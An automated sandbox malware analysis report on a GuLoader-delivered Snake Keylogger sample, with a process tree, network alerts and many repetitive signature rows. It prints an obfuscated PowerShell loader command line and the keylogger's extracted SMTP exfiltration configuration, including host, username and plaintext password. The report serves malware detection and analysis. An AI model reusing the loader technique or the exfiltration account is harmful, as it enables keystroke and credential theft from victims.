Windows
Analysis Report
file.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- file.exe (PID: 7420 cmdline:
"C:\Users\ user\Deskt op\file.ex e" MD5: 7FBB332B55F872E61C8307E0B5242287) - powershell.exe (PID: 7496 cmdline:
"powershel l.exe" -wi ndowstyle minimized "$Sprag=Ge t-Content 'C:\Users\ user\AppDa ta\Local\a cneform\Ca momiles.Be v';$Depurg e=$Sprag.S ubString(3 0781,3);.$ Depurge($S prag)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7504 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wabmig.exe (PID: 8168 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab mig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
{"Exfil Mode": "SMTP", "Username": "nicklog@wxtp.store", "Password": "7213575aceACE@@ ", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
System Summary |
---|
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-25T16:01:30.954113+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | TCP |
2024-09-25T16:01:34.877195+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49721 | 188.114.97.3 | 443 | TCP |
2024-09-25T16:01:39.227302+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49727 | 188.114.97.3 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-25T16:01:28.683636+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | TCP |
2024-09-25T16:01:30.386762+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | TCP |
2024-09-25T16:01:31.683648+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49716 | 132.226.247.73 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-25T16:01:26.987824+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49710 | 185.29.11.53 | 80 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | URL Reputation: | ||
Source: | URL Reputation: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Location Tracking |
---|
Source: | DNS query: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_00405C63 | |
Source: | Code function: | 0_2_00402910 | |
Source: | Code function: | 0_2_004068B4 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Code function: | 7_2_0094F631 | |
Source: | Code function: | 7_2_0094FA8D | |
Source: | Code function: | 7_2_25D42DC8 | |
Source: | Code function: | 7_2_25D42968 | |
Source: | Code function: | 7_2_25D40B30 | |
Source: | Code function: | 7_2_25D40B30 | |
Source: | Code function: | 7_2_25D42DBE | |
Source: | Code function: | 7_2_25D4D9A8 | |
Source: | Code function: | 7_2_25D4D550 | |
Source: | Code function: | 7_2_25D4310E | |
Source: | Code function: | 7_2_25D4D0F8 | |
Source: | Code function: | 7_2_25D4CCA0 | |
Source: | Code function: | 7_2_25D40040 | |
Source: | Code function: | 7_2_25D4F810 | |
Source: | Code function: | 7_2_25D4F3B8 | |
Source: | Code function: | 7_2_25D4EF60 | |
Source: | Code function: | 7_2_25D4EB08 | |
Source: | Code function: | 7_2_25D4E6B0 | |
Source: | Code function: | 7_2_25D4E258 | |
Source: | Code function: | 7_2_25D4DE00 |
Networking |
---|
Source: | DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | DNS query: | ||
Source: | DNS query: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_0040571B |
System Summary |
---|
Source: | File created: | Jump to dropped file |
Source: | Code function: | 0_2_00403532 |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_00406DC6 | |
Source: | Code function: | 0_2_0040759D | |
Source: | Code function: | 2_2_04C0EBD8 | |
Source: | Code function: | 2_2_04C0F4A8 | |
Source: | Code function: | 2_2_04C0E890 | |
Source: | Code function: | 2_2_0775C80E | |
Source: | Code function: | 7_2_0094C147 | |
Source: | Code function: | 7_2_0094D278 | |
Source: | Code function: | 7_2_0094C738 | |
Source: | Code function: | 7_2_0094E988 | |
Source: | Code function: | 7_2_009469A0 | |
Source: | Code function: | 7_2_0094CA08 | |
Source: | Code function: | 7_2_0094CCD8 | |
Source: | Code function: | 7_2_00943E13 | |
Source: | Code function: | 7_2_0094CFA9 | |
Source: | Code function: | 7_2_00946FC8 | |
Source: | Code function: | 7_2_00945370 | |
Source: | Code function: | 7_2_0094F631 | |
Source: | Code function: | 7_2_0094E97B | |
Source: | Code function: | 7_2_00943A91 | |
Source: | Code function: | 7_2_0094FA8D | |
Source: | Code function: | 7_2_25D49548 | |
Source: | Code function: | 7_2_25D42968 | |
Source: | Code function: | 7_2_25D49C18 | |
Source: | Code function: | 7_2_25D45028 | |
Source: | Code function: | 7_2_25D417A0 | |
Source: | Code function: | 7_2_25D40B30 | |
Source: | Code function: | 7_2_25D41E80 | |
Source: | Code function: | 7_2_25D4DDFF | |
Source: | Code function: | 7_2_25D4D999 | |
Source: | Code function: | 7_2_25D4D9A8 | |
Source: | Code function: | 7_2_25D4D550 | |
Source: | Code function: | 7_2_25D4295A | |
Source: | Code function: | 7_2_25D4D545 | |
Source: | Code function: | 7_2_25D4D0F8 | |
Source: | Code function: | 7_2_25D4CC8F | |
Source: | Code function: | 7_2_25D4CCA0 | |
Source: | Code function: | 7_2_25D40040 | |
Source: | Code function: | 7_2_25D4FC68 | |
Source: | Code function: | 7_2_25D4F810 | |
Source: | Code function: | 7_2_25D45018 | |
Source: | Code function: | 7_2_25D4F801 | |
Source: | Code function: | 7_2_25D4003B | |
Source: | Code function: | 7_2_25D48B90 | |
Source: | Code function: | 7_2_25D4178F | |
Source: | Code function: | 7_2_25D4F3B8 | |
Source: | Code function: | 7_2_25D48BA0 | |
Source: | Code function: | 7_2_25D4F3A8 | |
Source: | Code function: | 7_2_25D4EF51 | |
Source: | Code function: | 7_2_25D4EF60 | |
Source: | Code function: | 7_2_25D4EB08 | |
Source: | Code function: | 7_2_25D40B2F | |
Source: | Code function: | 7_2_25D4E6B0 | |
Source: | Code function: | 7_2_25D4E6AF | |
Source: | Code function: | 7_2_25D4E258 | |
Source: | Code function: | 7_2_25D4E249 | |
Source: | Code function: | 7_2_25D41E70 | |
Source: | Code function: | 7_2_25D4DE00 |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_00403532 |
Source: | Code function: | 0_2_004049C7 |
Source: | Code function: | 0_2_004021AF |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | Code function: | 2_2_04C0ADD9 | |
Source: | Code function: | 2_2_04C0D23D | |
Source: | Code function: | 7_2_00949D55 | |
Source: | Code function: | 7_2_0094891F | |
Source: | Code function: | 7_2_00948C30 | |
Source: | Code function: | 7_2_00948DE0 | |
Source: | Code function: | 7_2_00942D4F |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Registry key monitored for changes: | Jump to behavior | ||
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | API/Special instruction interceptor: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
